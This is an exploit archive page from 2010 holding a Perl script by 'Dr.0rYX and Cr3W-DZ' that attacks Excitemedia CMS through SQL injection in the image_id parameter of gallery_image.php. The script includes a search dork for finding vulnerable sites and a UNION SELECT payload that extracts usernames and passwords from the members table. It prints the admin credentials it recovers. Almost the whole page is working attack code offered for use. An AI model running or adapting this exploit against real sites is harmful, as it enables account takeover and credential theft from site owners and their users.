Home / os / win7

Excitemedia CMS SQL Injection Vulnerability

Posted on 23 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Excitemedia CMS SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== Excitemedia CMS SQL Injection Vulnerability =========================================== #!/usr/bin/perl -w # Excitemedia CMS Sql injection vulnerability # ######################################## #[+] Author : Dr.0rYX AND Cr3W-DZ #[+] Greetz : HIS0K4 - claw and all the other friends #[+] inurl:”gallery_image.php?image_id=” #[+] Vendor: http://www.excitemedia.com.au #[+] sell script with host ######################################## print &quot; | NORTH-AFRICA SECURITY TEAM | &quot;; print &quot;[x] Dr.0rYX AND Cr3W-DZ &quot;; print &quot;[x] N.A.S.T &quot;; print &quot;[x] Excitemedia Cms Sql injection vulnerability &quot;; print &quot;[x] www.nasteam.wordpress.com &quot;; print &quot; | vx3[at]hotmail.de | &quot;; print &quot; | cr3w[at]hotmail.de | &quot;; use LWP::UserAgent; print &quot; Target page:[http://site/path/]: &quot;; chomp(my $target=&lt;STDIN&gt;); $column_name=&quot;concat(0x757365723d,username,0x3a,0x70617373776f72643d,password)&quot;; $table_name=&quot;members&quot;; $b = LWP::UserAgent-&gt;new() or die &quot;Could not initialize browser &quot;; $b-&gt;agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target.&quot;/gallery_image.php?image_id=1 and 1=0 union select 1,2,&quot;.$column_name.&quot;,4,5,6,7,8 from &quot;.$table_name.&quot; limit 0,1--&quot;; $res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host)); $answer = $res-&gt;content; if ($answer =~ /user=(.*?):/){ print &quot; [+] Admin username : $1 &quot;; } else{print &quot; Error &quot;; } $answer = $res-&gt;content; if ($answer =~ /password=(.*?)&lt;/div&gt;/){ print &quot; [+] Admin password : $1 &quot;; } else{print &quot; Error &quot;; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP